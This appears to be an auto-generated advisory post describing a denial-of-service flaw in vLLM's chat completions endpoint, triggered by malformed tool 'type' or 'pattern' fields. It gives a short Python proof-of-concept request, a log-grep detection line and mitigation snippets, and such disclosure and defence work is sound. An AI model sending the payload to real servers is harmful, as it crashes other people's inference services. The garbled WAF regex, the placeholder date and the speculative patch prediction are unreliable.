Listen to this Post
How the CVE Works
The vulnerability in vLLM’s `/v1/chat/completions` endpoint stems from improper validation of user-supplied inputs in the `type` and `pattern` fields when using the tools functionality. The `type` field expects specific values (string, number, object, etc.), but arbitrary input triggers a runtime crash in the C++ JSON schema converter. Similarly, the `pattern` field undergoes Jinja2 rendering before unsafe regex compilation, allowing malformed expressions (e.g., unclosed brackets) to crash the C++ regex engine. A single malformed request terminates the worker, requiring manual restart. While RCE was not achieved, the lack of input sanitization poses a critical denial-of-service risk.
DailyCVE Form
Platform: vLLM
Version: Pre-patch
Vulnerability: Input validation bypass
Severity: Critical
Date: 2024-XX-XX
Prediction: Patch expected within 30 days
What Undercode Say:
Exploitation:
import requests
Crash via type field
payload = {
"model": "mistral-nemo-instruct",
"messages": [{"role": "user", "content": "crash"}],
"tools": [{
"type": "function",
"function": {
"name": "exploit",
"parameters": {
"type": "object",
"properties": {"a": {"type": "INVALID_TYPE"}}
}
}
}]
}
requests.post("http://target/v1/chat/completions", json=payload)
Detection:
Check worker crashes in logs grep -E "RuntimeError:.json_schema_converter.cc|regex_converter.cc" /var/log/vllm.log
Mitigation:
1. Input Sanitization:
VALID_TYPES = {"string", "number", "object", "boolean", "array", "null"}
if input_type not in VALID_TYPES:
raise ValueError("Invalid type field")
2. Regex Safety:
// C++ regex pre-validation
try {
std::regex test(pattern);
} catch (const std::regex_error& e) {
throw RuntimeError("Invalid regex pattern");
}
3. WAF Rule:
location /v1/chat/completions {
if ($request_body ~ '"type":\s"[^"]"|"pattern":\s"{.}") {
return 403;
}
}
Analytics:
- Impact: 100% worker crash rate per malicious request.
- Attack Vector: Low complexity (no auth required).
- Patch Priority: Immediate; workaround via input filtering.
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
